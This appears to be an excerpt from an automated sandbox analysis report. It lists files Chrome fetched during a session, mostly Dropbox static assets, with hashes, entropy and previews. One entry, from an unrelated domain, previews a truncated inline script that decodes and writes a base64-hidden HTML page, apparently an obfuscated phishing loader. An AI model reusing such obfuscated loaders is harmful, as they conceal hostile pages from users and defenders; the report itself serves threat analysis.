                                                                        SHA-256:9FC47D8563FB6E40F1C93DC69E41C683F68BF31A75C55C179B85504D003A846A
                                                                        SHA-512:E878544E525F72B5F5B08F8126EF4682EEBF6637DCA8B240BE18A8F7F6660BE6E502258008A1DE8F03EAEF514054A72F0C2635AEA1197242634B8751B36B0500
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cdn.sprig.com/shim.js?id=eHSY0Wh44Y
                                                                        Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="09812f48-7323-50d2-9bb0-e02808faef7d")}catch(e){}}();.(function(){"use strict";var Ps=Object.defineProperty;var Os=(M,W,Z)=>W in M?Ps(M,W,{enumerable:!0,configurable:!0,writable:!0,value:Z}):M[W]=Z;var R=(M,W,Z)=>(Os(M,typeof W!="symbol"?W+"":W,Z),Z);let M;const W=new Uint8Array(16);function Z(){if(!M&&(M=typeof crypto<"u"&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto),!M))throw new Error("crypto.getRandomValues() not supported. See https://github.com/uuidjs/uuid#getrandomvalues-not-supported");return M(W)}const U=[];for(let e=0;e<256;++e)U.push((e+256).toString(16).slice(1));function Xn(e,t=0){return U[e[t+0]]+U[e[t+1]]+U[e[t+2]]+U[e[t+3]]+"-"+U[e[t+4]]+U[e[t+5]]+"-"+U[e[t+6]]+U[e[t+7]]+"-"+U[e[t+8]]+U[e[t+9]]+"-"+U[e[t+10]]+U[e[t+11]]+U[e[t+12]]+U[e[t+13]]+U[e[t+1
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1025)
                                                                        Category:downloaded
                                                                        Size (bytes):1026
                                                                        Entropy (8bit):4.686137439870003
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:20DEA3DFDE3B9352F8294408ADC604E9
                                                                        SHA1:C21EDD35DB63CD8852790ECE8323957643928648
                                                                        SHA-256:0DA537469F646AEA2AB5EAFE2641AA33C329A7D17F2751B63D93D39722BFB21C
                                                                        SHA-512:B1B85EBBEC740D86F5FFDF4379B8A905D640C94C34DDA6DB9815FF3302C720E7208D487202877A5783628E03D938DC260510ACC320E85564AC65ACA9EFFBB497
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/recaptcha-vflIN6j39.css
                                                                        Preview:.recaptcha-v2-challenge-container{display:none}.recaptcha-v2-challenge-container .text-input-error-wrapper{line-height:normal;color:#e82110;font-size:12px;min-height:17px;margin-top:10px}.recaptcha-v2-challenge-container .text-input-error-wrapper span.error-message{color:#e82110;display:block;font-size:12px}.recaptcha-v2-challenge-container .text-input-error-wrapper br{display:none}.recaptcha-v2-challenge-container .recaptcha_v2_challenge{margin-top:5px}.recaptcha-invisible-challenge-container{display:none}.recaptcha-invisible-challenge-container .text-input-error-wrapper{line-height:normal;color:#e82110;font-size:12px;min-height:17px;margin-top:10px}.recaptcha-invisible-challenge-container .text-input-error-wrapper span.error-message{color:#e82110;display:block;font-size:12px}.recaptcha-invisible-challenge-container .text-input-error-wrapper br{display:none}.recaptcha-invisible-challenge-container .recaptcha_invisible_challenge{margin-top:3px}.recaptcha-terms-text{font-size:12px;font-
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (24125)
                                                                        Category:downloaded
                                                                        Size (bytes):24511
                                                                        Entropy (8bit):5.33697065311503
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:48142D71128D2F7B019CA5F53E717417
                                                                        SHA1:AE2FECE1BAE0833D7AB1B0A09B67C4AA22BDB6D1
                                                                        SHA-256:3B79348DF27766A6801C904C72681EF889FF12590298CF286420F9C0D1594FB6
                                                                        SHA-512:59A260405D23E0618D51564599B5F927DF526E2560B116CF1F36955269CC61BC2A09A02CCE33493D85B214114A087B66CB7C390BAB82083012C9BA4F5C0D4659
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_sharing_invitation_signup_page-vflSBQtcR.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="4d0260f2-060c-3e7f-88a8-cde45b6bcfc2")}catch(e){}}();.define(["exports","react","./e_file_viewer_static_scl_page_file","./c_core_i18n","./c_signup_signin_unified_susi","./c_maestro_nav_shared_code_dropbox_logo","./c_sharing_components_shared_content_icon","./c_dig-icons_assets_ui-icon_line_team","./c_dig-icons_assets_ui-icon_line_notification","./e_edison","./c_pap-events_sign_save_signature_doc","./c_plugin_utils_getImageDefaultSizes","./c_lodash","./c_api_v2_routes_user_metadata_provider","./e_core_exception","./c_init_data_edison","./c_hive_schemas_sharing-request_access_user_events","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_src_sink_index","./c_performance_metrics_route_name_resolver","./c_memoize-one","./c_api_v2_noauth_client","metaserver/static/js/mo
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:C source, ASCII text, with very long lines (1107)
                                                                        Category:dropped
                                                                        Size (bytes):1502
                                                                        Entropy (8bit):5.3055690287712345
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:3D5DB6F7E6A6D66117A407FADD495DF2
                                                                        SHA1:4CF595DB23468C350F366290FE1026113FEE6075
                                                                        SHA-256:AAA38A9E17AC10668AEAAD4EB4B5331CEB55D96A9BAC4ED0D13FE3A730B00B33
                                                                        SHA-512:4E2FD7DE4F5F843335DD4D0FDB6E10A73153858A7B90EC1E4D1E40C11E2974D230932CF4A49A2B8AC9C29ACB7BD46E29AD063B2DA4DFA1894B1CC6F5996B51E7
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="4869efb2-0364-3bda-bbdc-ce2b7b123780")}catch(e){}}();.define(["exports","./c_memoize-one","./c_api_v2_routes_user_metadata_provider"],(function(e,t,n){"use strict";const o=function(e){};class s{constructor(e=(()=>{})){this._mapper=e}static getInstance(){return s._instance||(s._instance=new s),s._instance}static reset(){s._instance=new s}setMapper(e){this._mapper=e}resolve(){let e="";try{e=this._mapper(window.location)}catch(e){}return e||""}}s._instance=null;const r=s.getInstance();e.resolveRouteName=()=>r.resolve(),e.sendXhr=function(e,s,r=o){t.assertDropboxDomain(e),function(e){const n=t.readCsrfToken();e.is_xhr=!0,e.t=n}(s);const a=function(e){const t=[];for(const n in e)e.hasOwnProperty(n)&&void 0!==e[n]&&t.push(`${encodeURIComponent(n)}=${encodeURIComponent(String(e[n]))}`)
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:HTML document, ASCII text, with very long lines (6725), with CRLF line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):17964
                                                                        Entropy (8bit):5.873900876717426
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E11B62118A0249EA8C86D09155B7397D
                                                                        SHA1:5774D77641F60C1DCB9D3BDC5467E4F3CA6D05B8
                                                                        SHA-256:FC5F267C6042847D7F7C1DEFBE80C2AD3DFC386071BB3210FF16A668EE1EF5D3
                                                                        SHA-512:71E2EC2C488C2FF59F71B89A2AE3761FF2F15E86284A7B5578760D865E11C582C5705410B2C791D80C1BCDFB901C4CC0F0956D471A1D63A87F7B5CBABC4AF27E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://aocds.ingenalsp.com/J8NtuOX/
                                                                        Preview:<script>..if("https://U8WWA.ingenalsp.com/J8NtuOX/" == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNBV1F4UFJCWWZ4IGg0e21hcmdpbi10b3A6MDttYXJna
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1281)
                                                                        Category:downloaded
                                                                        Size (bytes):1331
                                                                        Entropy (8bit):5.025370189455523
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:68B92CF8F7C6D25796C695153614D004
                                                                        SHA1:718B985F5FA2A0FB44A5418FAF206B0BCBC07ABA
                                                                        SHA-256:432741E746A4433ED39843670574A69AE8724BAB0DE5A8992510B99C34646D12
                                                                        SHA-512:61150F5DD9A7DDA8AE528C3A4751580A9CB561F1016363BA2D760EB7C21C87FC9D244632C52551FA75A997173C635289B15C1E9D7A9BA1D2FC5D2C73268D2D62
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/js/signup_signin/unified_susi/susi/header.module.out-vflaLks-P.css
                                                                        Preview:._toggle-link-container_6mkyf_4{align-items:start;display:flex;justify-content:flex-start;padding-top:var(--dwg-spacing__unit--0_5)}._toggle-link-container_6mkyf_4._login_6mkyf_11{margin-bottom:30.5px}._toggle-link-container_6mkyf_4._register_6mkyf_15{margin-bottom:22.5px}._form-header_6mkyf_19{margin-bottom:24px}._form-header_6mkyf_19 strong{font-weight:500}._header-logo-container_6mkyf_27{margin-bottom:8px}._header-logo-image_6mkyf_31{display:block;margin:auto;max-height:64px;padding:24px 0}._header-logo-image-large_6mkyf_38{display:block;margin:auto;max-height:120px;padding:8px 0}._email-as-label_6mkyf_45{margin-bottom:24px}._reduced-bottom-margin_6mkyf_50{margin-bottom:12px}._back-button-wrapper_6mkyf_54{padding-bottom:50px;position:relative}._go-back-button_6mkyf_59{color:var(--dwg-theme__color__core__primary);float:left;text-decoration-color:var(--dwg-theme__color__attention__border)}._left-align_6mkyf_65{text-align:left}._center-align_6mkyf_69{text-align:center}._right-align_6mk
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (26424)
                                                                        Category:dropped
                                                                        Size (bytes):69230
                                                                        Entropy (8bit):5.357881060372453
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E6476F48191392C035CF0769244764D0
                                                                        SHA1:FD3730F946EBF68A2154216F72C9D2517B991ED4
                                                                        SHA-256:30F5DEDB8A0416E26C3105CDAA6BFF67C70ADB5F1DB7BE84D5F6EB00BF7BA49E
                                                                        SHA-512:D8C12C2D80588B853374B5E8A50659E24EDB92CAFD449D31EA9EE9D76510F63BD310649AC5AAA8F0308A68339CBA5DB66C66E7636E56AF5913516CF4F4C41E2C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:;/*FB_PKG_DELIM*/..__d("$",["fb-error-lite"],(function(a,b,c,d,e,f,g){function a(a){return h(a,typeof a==="string"?document.getElementById(a):a)}function b(a){return h(a,typeof a==="string"?document.getElementById(a):a)}function h(a,b){if(!b){a=c("fb-error-lite").err('Tried to get element with id of "%s" but it is not present on the page',String(a));a.taalOpcodes=a.taalOpcodes||[];a.taalOpcodes=[c("fb-error-lite").TAALOpcode.PREVIOUS_FILE];throw a}return b}a.fromIDOrElement=b;g["default"]=a}),98);.__d("ArbiterMixin",["Arbiter","guid"],(function(a,b,c,d,e,f,g){var h="arbiter$"+c("guid")(),i=Object.prototype.hasOwnProperty;a={_getArbiterInstance:function(){return i.call(this,h)?this[h]:this[h]=new(c("Arbiter"))()},inform:function(a,b,c){return this._getArbiterInstance().inform(a,b,c)},subscribe:function(a,b,c){return this._getArbiterInstance().subscribe(a,b,c)},subscribeOnce:function(a,b,c){return this._getArbiterInstance().subscribeOnce(a,b,c)},unsubscribe:function(a){this._getArbiterIn
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), CFF, length 76848, version 2.2490
                                                                        Category:downloaded
                                                                        Size (bytes):76848
                                                                        Entropy (8bit):7.9975204464424285
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:7B64AE005DCD81A935C942003BC42592
                                                                        SHA1:BCCD94576804EDD18F26BC7661D3F85B6B3EFC73
                                                                        SHA-256:8E89E4C4CBC9F5B62D5CC9939383F42998F58FCD22FA2D0F07A15EBCC11BE892
                                                                        SHA-512:DA3997372DA50B62FA1227CBD416019D17C40C4C811A85ABAB667DE3CCC7CCF071801B0AEC893128A819077A9AA8B0CD23BAC07A89D86D8CE5E4342BAE61F4A1
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/fonts/SourceCodePro-Regular-2038.otf.woff2
                                                                        Preview:wOF2OTTO..,0.......l..+..........................F...S..j..\..J.`..f.6.$..B....N. [~....2.....`..ADT=...m..of..:.6^HZ..s..|{........"............,.6g7d....QD...~m.@. p..T...s...:.3N>...H...P.[.n...Z...!Q2.lK.]..Bn.A..UL...H.!..t..........{.-...........Z{@ff...".H...Z..D..<._T.(..|%QH..v.g....i..?.'.vl-.$.3v2R...C#..ol.R.Z...9.2b"...-..w.....7q..s.....F.*B....K..=...e.S..Z...N..<.W*].....N.[..@f.1.V.N..r..D...K..r.P.E....o...DNwKD%.w....g.....@....z'o...,....>G8..Fx...^.ff%?...j........2?P.0.=...^8..L......p'.'.;f......{a/........p."........(..JnaP,...>..<.d..|VL......\IA.......\L..rj.l.....9...Z...._a.!.adE.K..S.....D......1..5==....R...I.B...]+....u...y...R....a...P........{..U...f.........../.]@..c......<..7L...n..b.u..q.,...E.../9...tS^.L....^.......\.. +vu..S4..c...t..x~...#7."....M..RCR..OU..u.F...3...6<^[...N...Ui..X.9d.B.RH).8&.A.dYDf..'nJ.@..{....{n...M..ga.P.#...:...[..D... *.....3q...\.Y9v..4-W.jek[..ll.......w...c.m._Y.i..". ..""..bn.G
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 78156, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):78156
                                                                        Entropy (8bit):7.997212603610092
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:9C03B55DB2514E78544FC6EF3688CB3D
                                                                        SHA1:BE95C3384839101A823BF888C08E1B5F228D2C1F
                                                                        SHA-256:3820C628FA5191F2A8405E9B1411A48B38AD38D8DAA051E7CA1D7FAEE29793F7
                                                                        SHA-512:76E7E5759F13B6C802AE892D3356968D11B976C96572190D95BDAAF20F848150DEFB1AF72C9E112D1A7FD17FCFC23B6BA13D4DA17E180602D2F09217BAA2634F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/fonts/AtlasGrotesk-Regular-190618-Web.woff2
                                                                        Preview:wOF2......1L.......p..0............................^..d.`.......s.....P.....4..6.$..d. ..<.....l[.I..J......Tt..5.9.*t..}......D..t..g1....z-..A.m. ............nY<k...t.].r.A.cTr....f.T...E...$.)f.......Z...(..MG%b.]. .b..Pe.9..E..,.>././163.A..X1jTK..z.j.u,.[.M.....7.....7.. ...=..l.8...#>..H-...5U..3UK4e.t..bMS..s.......68q...Gpm..........:..w.(a:....^...A..F|..2....n.,..k....h.I...<(..t%...1{..[~...n.{..J..Y..W......|?}.!......7.....*s...>.w&.....4..#..Xy.....V...2...1.8RD...W1....T;.D3\.J.N.dn.....~uy..k.}..,=H.r(U2.+L.V....C~.?uS....Rq.Q....3.W..t....2)?.Z.r.U..y....].....5N..A..Y.1s.E^aX.'.b..$(.....d>.,Y.O.Qv..o.b..T2..kG)-.S.....3.i.-2!.y^.l.....43+..f*Y......}A!MTu1.8...s).W|..._....{...$........v..J.Q.....j)h.Yj.......F..{.....aB..."J.g.?SV%.eF..'....g...=.ff...'.r).&.........D.7...M...9.....f,F."..X..K. ...Y.....Y.n.5...5...<.TsJ.j..YB.g..xL....YfN'z.....%LD14[3z.!hh.|,nl......z......m.>=s.[X3f.c..3..1)....I!.c...x..R..-u..A.D
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65075)
                                                                        Category:downloaded
                                                                        Size (bytes):107105
                                                                        Entropy (8bit):5.307445139966149
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D3FC912A329CFDC72E9591BB1D9EC669
                                                                        SHA1:D93BA001DE46C55B5BADDFC499EC6FFA0C86335B
                                                                        SHA-256:B71D59A73375E3D0EB879194106B7EF09AA5DCD95F77EB8EAEBD80157A2EEA65
                                                                        SHA-512:94C7F8C34E36B24D4C0CC693CB2B885C43C1C6F0970716E817439EB0A20310303DB5C11197DFC874C12850036619E4DAABF56719AA94A1E46C2081DB3CCC9859
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_lodash-vfl0_yRKj.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="3419d6c9-ec50-375c-a479-8f05c73eb0ff")}catch(e){}}();.define(["exports"],(function(n){"use strict";var t="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function r(n){return n&&n.__esModule&&Object.prototype.hasOwnProperty.call(n,"default")?n.default:n}var e={exports:{}};!function(n,r){(function(){var e,u="Expected a function",o="__lodash_hash_undefined__",i="__lodash_placeholder__",a=16,f=32,c=64,l=128,s=256,v=1/0,p=9007199254740991,h=NaN,_=4294967295,g=[["ary",l],["bind",1],["bindKey",2],["curry",8],["curryRight",a],["flip",512],["partial",f],["partialRight",c],["rearg",s]],y="[object Arguments]",d="[object Array]",b="[object Boolean]",j="[object Date]",w="[object Error]",m="[object
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (7763)
                                                                        Category:downloaded
                                                                        Size (bytes):8158
                                                                        Entropy (8bit):5.24551302641834
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F8D8BA40B84D063753E40E1A179D41E3
                                                                        SHA1:C97178D3C299AB615EF576605DE1326BF4D136C2
                                                                        SHA-256:ECA1A6E4A188FA5DF710BF915D968EDD71A77F2FCEA880113FDCB9C955953D77
                                                                        SHA-512:585C2F961D31A4151FB0A8B147C9A2F6BA607AAFD67F613145F68B35D0D60D1F7D42C0CE574B0A450113CAF5367C48AD8C91FFEA8E255CC7A8A7FB5198FA83F7
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_underline-vfl-Ni6QL.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="4d4488b5-6a8c-377f-901d-00ed88f43a64")}catch(e){}}();.define(["exports","react"],(function(e,l){"use strict";function t(e){if(e&&e.__esModule)return e;var l=Object.create(null);return e&&Object.keys(e).forEach((function(t){if("default"!==t){var n=Object.getOwnPropertyDescriptor(e,t);Object.defineProperty(l,t,n.get?n:{enumerable:!0,get:function(){return e[t]}})}})),l.default=e,Object.freeze(l)}var n=t(l);e.AddFileLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M11 10h1.5v2h2v1.5h-2v2H11v-2H9V12h2v-2Z",fill:"currentColor",vectorEffect:"non-suserng-stroke"}),n.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"m15.97 4.66 1.371 1.37A2.235 2.235 0 0 1 18 7.622V20H5.5V4h8.879a2.265 2.265 0 0 1 1.591.66ZM7 5.5v13h9.5V8H14V5.5
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):92
                                                                        Entropy (8bit):5.131658559879718
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:0830FC97AB66028DA10431D7CAE531EF
                                                                        SHA1:48777955A7DB74164F7E3DDEAB0C1C18D997E6DF
                                                                        SHA-256:C5D7531F068BB62F938616CBC77C2B5CA30F944CDEA156926741D85646736895
                                                                        SHA-512:4FD92B6A4980F4DEC944DBD30D24167FE62C4A57CED492FDE7FA44E776341B6BC67866D956322BD74603759219B2CBD87386AEA2D580848D261241DA6FD2B2FA
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlWeT7ayG73TxIFDZrSla4SBQ3Vcgqy?alt=proto
                                                                        Preview:CkEKDQ2a0pWuGgQIVhgCIAEKMA3VcgqyGgYITBABGAMqIQgKUh0KEyFAJCMuKi1fPyYlKy9eLDo9KSgQARj/////Dw==
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 327342
                                                                        Category:dropped
                                                                        Size (bytes):79438
                                                                        Entropy (8bit):7.996588219004313
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:710663B84FB797712F706B62DD8D9C34
                                                                        SHA1:56C297E6E14D5A3544832D842162DA1696FDCDC5
                                                                        SHA-256:6F54B1CF4DCC85AFEC29701F873085122A462E9F654FDB403E0CE19883B3AA40
                                                                        SHA-512:B68DA2EC71AAE6F42D36EB2EE1FF2D0A9D9377FA86B1F39F15E98FB35C4A3510F2163A8743E61247731B514B31DA29FE83E76AF13C9D2AD434052EACE20A3297
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:............r../...B..C..........Il...uS).MB....!);....k..Or......$'3..?fb....F.....h4v..._....}...............//_.:n2.../V.%4.....%~.. ....yp.0?...x..i..c/...]@...%.a..e................5.).I...l.3...4.s.(vS;w.r..58P.]..N....8..u.....;'....>.`.Q.<?z..7..s.....=.Jh|..$..y..x......=zi....v...w....~.g..!.(.w..........C.Qlo......F.}...}..`..{{.].......C..>...........2...;......>I......,]8..M.4.'.C....L..L....2oB3.~f....K..sg.M......]/I..p.b4..~........o9.....u...nn;.0..(.G..hD77..%I...i../..g4.3.........q...C...9q/.......[N:.u....l...N.F.<..'..".9..i...S.9.sZ..f..n....>....5.3.c..MR.dn...,.S.E4._....$.r..9M....,.g.N|...."......Q....7g79......ya4O.P.wJ.y.wa...)......,_$.M)..Q....S...<.0.v(.B....KoF..4......%I..w.E,..^.....<zi....b.<.cjA.q%....*.D.....,...sA&n....).r7..$....../...{.Y.b......W..2.k...f..p...B|7..qo}`.aDO..v^^.1....>..0.[.'...k/...$.r,..wy.iSs.{.....9.A..._h._u...G..o"p.+.F.......WHm.;h-........K?.......Dp.....Np..{....".
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2299)
                                                                        Category:dropped
                                                                        Size (bytes):2693
                                                                        Entropy (8bit):5.336349644577927
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:1AFB98E8CCDF042F3AF52EE7C8F12B41
                                                                        SHA1:36B42DFD9946D853314C52D25F28D9A5DF6C8259
                                                                        SHA-256:EB3D9A3A25E27A2CF436ED5B2E12B874A46C766D2CA010E788B5DBDB23F007E9
                                                                        SHA-512:969D18BADC3C951F5EFEE3AFE8BE1D7A1E88E6A8AD07818B1C8A830247AED24C7B4EAEF296026508443291754F3B454BF60D1B26C8CBD1A1E4A973977C227A0D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="819278a6-546b-3f36-8612-673cb297c772")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function l(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(l){if("default"!==l){var r=Object.getOwnPropertyDescriptor(e,l);Object.defineProperty(t,l,r.get?r:{enumerable:!0,get:function(){return e[l]}})}})),t.default=e,Object.freeze(t)}var r=l(t);e.QrCodeLine=e=>r.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},r.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M13 5v6h6V5h-6Zm4.5 1.5h-3v3h3v-3ZM5 13v6h6v-6H5Zm4.5 1.5h-3v3h3v-3ZM5 5h6v6H5V5Zm1.5 1.5h3v3h-3v-3Z",fill:"currentColor",vectorEffect:"non-suserng-stroke"}),r.createElement("path",{d:"M13 13h1.5v1.5H13V13Z",fill:"currentColor",vectorEffect
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 87400, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):87400
                                                                        Entropy (8bit):7.997700712809817
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:EE4A8E042003216A751B343365276DEB
                                                                        SHA1:17C4E71EA77FE2A716A547464092B0979F4861E2
                                                                        SHA-256:440DF30B344DC7F6D13B5ABB6D317F896B39905833021003BDC4B0C37D049D14
                                                                        SHA-512:EDDF91BC69A3C87FA11C3685BF4CA671EB14100A6B863E9AE4A719C290EFE667B296B970220334D54DE796635E644424EC26846A29E1AF5770A0484A53583BC2
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/fonts/AtlasGrotesk-BoldItalic-190618-Web.woff2
                                                                        Preview:wOF2......Uh.........U............................@..d.`....>..s........`..4..6.$..d. ..o.....T[C..._...m5.SW.i.s.I..*....Zwh6.G<.8..........:.r..FT..ft..uD...........Dlz:..r.<..$....6.u..X..5...$...+.CIk.....E...R4kRm..*..".U......."o...q..~...01G<.1...,.r....Yc^tp..a~...:.Z..JU.1..,...BU..{...,S.&\.^..I.*.L.G...9...dhQ9...q..cd.Y..qRi.....O..vJ.*...=`.vb.swd..(.~!J....)|.ir...]....#..".U.~.....m.1..Q.Ec.u.B.L...?,.......r....(E..cd..]l`8.dP..Q./.:.I...vbv.*[..g.c..N.]/gi..p`.>P.~Q.......^.}..5.EB,.!.xA.....S....=.{x.6......$]j...I.F.|..I.n..+tLy..i.b.'.....{6..iE=~......x1fP..n.'..E....;..Y....B.{|...Y@v1.....>.d.....t{.j.,Q.8R...1+.s.'c..{....a:.........A.....<./.|.......j.\..+j.T;D.h...p...t'..,.%.d..8.. .e'.....K....m.... [%L...e...h.....a.8!....D....n...j9.r..^.{.../ ...#......v:@.W..'rS...X..|.....1......x....7...1Q.5....o..O..NE:W.q...&F.baTa.F.2..:.`........s......}.3...4..`.......g..... . ...X..B^.;..n.n..I...aT.y...?.I'.%&6
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2760)
                                                                        Category:dropped
                                                                        Size (bytes):3153
                                                                        Entropy (8bit):5.2275835389646454
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:21DC00AA26FA96F092EA0FA51C7E7DB0
                                                                        SHA1:136B675EDCFB40A91997593D0BE5EC27D57BC921
                                                                        SHA-256:27B6E1F220549BDC9B1733638FF56AA77F304D30F87D40A760EB876A7F44381D
                                                                        SHA-512:6771898B3F3F15DF2405893B1CE0D7A9FAAC7735B57AC89B64C2240570F558C7B3FE4FEE39EC6FCCAAEBD6F4F7D7813A196DD39D79FB2A1DB6DE35A04A8E6511
                                                                        Malicious:false
                                                                        Reputation:unknown
